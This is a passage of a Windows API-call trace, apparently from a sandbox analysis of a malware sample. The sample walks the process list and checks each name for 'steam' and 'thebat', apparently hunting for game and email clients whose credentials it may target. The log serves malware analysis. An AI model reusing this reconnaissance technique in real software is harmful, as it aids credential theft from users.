hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0099.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.398] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357bc88 [0099.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x357bc88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0099.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0099.398] StrStrIA (lpFirst="ripe.exe", lpSrch="steam") returned 0x0 [0099.398] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0099.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.399] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bca0 [0099.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x357bca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0099.399] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0099.399] StrStrIA (lpFirst="acoustic.exe", lpSrch="steam") returned 0x0 [0099.399] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0099.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.400] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357b9b8 [0099.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x357b9b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0099.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0099.400] StrStrIA (lpFirst="mail.exe", lpSrch="steam") returned 0x0 [0099.400] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.401] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b9d0 [0099.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x357b9d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0099.401] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0099.401] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="steam") returned 0x0 [0099.402] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.403] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357ba48 [0099.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357ba48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.403] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.403] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0099.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.404] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bf10 [0099.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x357bf10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0099.404] StrStrIA (lpFirst="dllhost.exe", lpSrch="steam") returned 0x0 [0099.404] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.405] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357be80 [0099.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357be80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.405] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.405] StrStrIA (lpFirst="taskhostw.exe", lpSrch="steam") returned 0x0 [0099.405] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0099.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.407] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357bfa0 [0099.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x357bfa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0099.407] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0099.407] StrStrIA (lpFirst="UsoClient.exe", lpSrch="steam") returned 0x0 [0099.407] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.408] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357bcd0 [0099.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357bcd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.408] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.408] StrStrIA (lpFirst="taskhostw.exe", lpSrch="steam") returned 0x0 [0099.408] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0099.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0099.410] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357a5f8 [0099.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357a5f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0099.410] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0099.411] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="steam") returned 0x0 [0099.411] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0099.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.412] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a738 [0099.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357a738, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0099.412] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0099.412] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="steam") returned 0x0 [0099.412] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0099.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.413] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b870 [0099.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356b870, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0099.413] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0099.413] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="steam") returned 0x0 [0099.413] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.414] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bda8 [0099.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x357bda8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.414] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0099.414] StrStrIA (lpFirst="conhost.exe", lpSrch="steam") returned 0x0 [0099.414] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.415] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bf58 [0099.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x357bf58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0099.416] StrStrIA (lpFirst="conhost.exe", lpSrch="steam") returned 0x0 [0099.416] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0099.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.417] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357be98 [0099.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x357be98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0099.417] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0099.417] StrStrIA (lpFirst="rxodge.exe", lpSrch="steam") returned 0x0 [0099.417] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0099.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.418] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357be08 [0099.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x357be08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0099.418] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0099.418] StrStrIA (lpFirst="sppsvc.exe", lpSrch="steam") returned 0x0 [0099.418] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0099.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.419] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a618 [0099.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357a618, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0099.419] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0099.419] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="steam") returned 0x0 [0099.419] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0099.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.420] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357beb0 [0099.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x357beb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0099.420] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0099.420] StrStrIA (lpFirst="TiWorker.exe", lpSrch="steam") returned 0x0 [0099.420] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0099.421] CloseHandle (hObject=0x358) returned 1 [0099.421] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0099.435] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.436] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a678 [0099.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357a678, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0099.436] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0099.436] StrStrIA (lpFirst="[System Process]", lpSrch="thebat") returned 0x0 [0099.436] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0099.438] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574f70 [0099.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574f70, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0099.438] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0099.438] StrStrIA (lpFirst="System", lpSrch="thebat") returned 0x0 [0099.438] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.439] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357bd90 [0099.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x357bd90, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0099.439] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0099.439] StrStrIA (lpFirst="smss.exe", lpSrch="thebat") returned 0x0 [0099.439] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.442] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357bd78 [0099.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x357bd78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0099.442] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0099.442] StrStrIA (lpFirst="csrss.exe", lpSrch="thebat") returned 0x0 [0099.442] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.444] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bdc0 [0099.444] WideCharToMultiByte (in: 